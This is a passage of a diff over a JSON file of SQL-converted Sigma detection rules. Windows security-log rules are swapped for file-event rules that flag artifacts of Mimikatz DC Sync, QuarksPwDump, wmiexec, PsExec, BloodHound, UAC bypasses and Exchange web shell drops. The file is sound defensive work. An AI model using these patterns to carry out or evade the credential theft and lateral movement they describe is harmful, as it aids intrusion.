"level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" ], - "filename": "win_security_hybridconnectionmgr_svc_installation.yml" + "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" }, { - "title": "Possible Shadow Credentials Added", - "id": "f598ea0c-c25a-4f72-a219-50c44411c791", + "title": "Office Macro File Creation From Suspicious Process", + "id": "b1c50487-1967-4315-a026-6491686d860e", "status": "experimental", - "description": "Detects possible addition of shadow credentials to an active directory object.", - "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "description": "Detects the creation of a office macro file from a a suspicious process", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1556" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" ], - "filename": "win_security_susp_possible_shadow_credentials_added.yml" + "filename": "file_event_win_office_macro_files_from_susp_process.yml" }, { - "title": "Password Change on Directory Service Restore Mode (DSRM) Account", - "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", - "status": "stable", - "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", - "author": "Thomas Patzke", + "title": "Suspicious DotNET CLR Usage Log Artifact", + "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", + "status": "experimental", + "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", + "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Initial installation of a domain controller" + "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" ], - "filename": "win_security_susp_dsrm_password_change.yml" + "filename": "file_event_win_net_cli_artefact.yml" }, { - "title": "Sysmon Channel Reference Deletion", - "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", + "title": "QuarksPwDump Dump File", + "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", "status": "test", - "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects a dump file written by QuarksPwDump password dumper", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" ], - "filename": "win_security_sysmon_channel_reference_deletion.yml" + "filename": "file_event_win_hktl_quarkspw_filedump.yml" }, { - "title": "Operation Wocao Activity - Security", - "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", + "title": "CVE-2021-26858 Exchange Exploitation", + "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", + "attack.t1203", "attack.execution", - "attack.t1053.005", - "attack.t1059.001" + "cve.2021.26858" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" ], - "filename": "win_security_apt_wocao.yml" + "filename": "file_event_win_cve_2021_26858_msexchange.yml" }, { - "title": "Suspicious Scheduled Task Update", - "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", + "title": "PSEXEC Remote Execution File Artefact", + "id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", "status": "experimental", - "description": "Detects update to a scheduled task event that contain suspicious keywords.", + "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", + "attack.lateral_movement", "attack.privilege_escalation", + "attack.execution", "attack.persistence", - "attack.t1053.005" + "attack.t1136.002", + "attack.t1543.003", + "attack.t1570", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" ], - "filename": "win_security_susp_scheduled_task_update.yml" + "filename": "file_event_win_psexec_service_key.yml" }, { - "title": "KrbRelayUp Attack Pattern", - "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", + "title": "Suspicious ASPX File Drop by Exchange", + "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", "status": "experimental", - "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", - "author": "@SBousseaden, Florian Roth", + "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", + "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" ], - "filename": "win_security_susp_krbrelayup.yml" + "filename": "file_event_win_exchange_webshell_drop.yml" }, { - "title": "RottenPotato Like Attack Pattern", - "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", - "status": "test", - "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", - "author": "@SBousseaden, Florian Roth", + "title": "Suspicious File Creation In Uncommon AppData Folder", + "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", + "status": "experimental", + "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1557.001" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_susp_rottenpotato.yml" + "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" }, { - "title": "Windows Defender Exclusion Set", - "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", - "status": "test", - "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", - "author": "@BarryShooshooga", + "title": "Suspicious Executable File Creation", + "id": "74babdd6-a758-4549-9632-26535279e654", + "status": "experimental", + "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1564" ], "falsepositives": [ - "Intended inclusions by administrator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\'))" ], - "filename": "win_security_defender_bypass.yml" + "filename": "file_event_win_susp_executable_creation.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - Security", - "id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", - "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "UAC Bypass Using MSConfig Token Modification - File", + "id": "41bb431f-56d8-4691-bb56-ed34e390906f", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_clip_services_security.yml" + "filename": "file_event_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Mimikatz DC Sync", - "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", + "title": "Wmiexec Default Output File", + "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", "status": "experimental", - "description": "Detects Mimikatz DC sync security events", - "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", + "description": "Detects the creation of the default output filename used by the wmiexec tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.s0002", - "attack.t1003.006" + "attack.lateral_movement", + "attack.t1047" ], "falsepositives": [ - "Valid DC Sync that is not covered by the filters; please report", - "Local Domain Admin account used for Azure AD Connect" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$')" ], - "filename": "win_security_dcsync.yml" + "filename": "file_event_win_wmiexec_default_filename.yml" }, { - "title": "Weak Encryption Enabled and Kerberoast", - "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", - "status": "test", - "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", - "author": "@neu5ron", + "title": "Suspicious Creation with Colorcpl", + "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "status": "experimental", + "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1564" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE '%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE '%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE '%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE '\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE '\\'))))" ], - "filename": "win_security_alert_enable_weak_encryption.yml" + "filename": "file_event_win_susp_colorcpl.yml" }, { - "title": "CVE-2023-23397 Exploitation Attempt", - "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", + "title": "BloodHound Collection Files", + "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", "status": "experimental", - "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.", - "author": "Robert Lee @quantum_cookie", + "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", + "author": "C.J. May", "tags": [ - "attack.credential_access", - "attack.initial_access", - "cve.2023.23397" + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM" + "Some false positives may arise in some environment and this may require some tuning. Add addional filters or reduce level depending on the level of noise" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" ], - "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" + "filename": "file_event_win_bloodhound_collection.yml" }, { - "title": "Active Directory User Backdoors", - "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", - "status": "test", - "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", - "author": "@neu5ron", + "title": "CVE-2022-24527 Microsoft Connected Cache LPE", + "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", + "status": "experimental", + "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1098", - "attack.persistence" + "attack.privilege_escalation", + "attack.t1059.001", + "cve.2022.24527" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_alert_ad_user_backdoors.yml" + "filename": "file_event_win_cve_2022_24527_lpe.yml" }, { - "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", - "id": "2c99737c-585d-4431-b61a-c911d86ff32f", + "title": "UAC Bypass Using EventVwr", + "id": 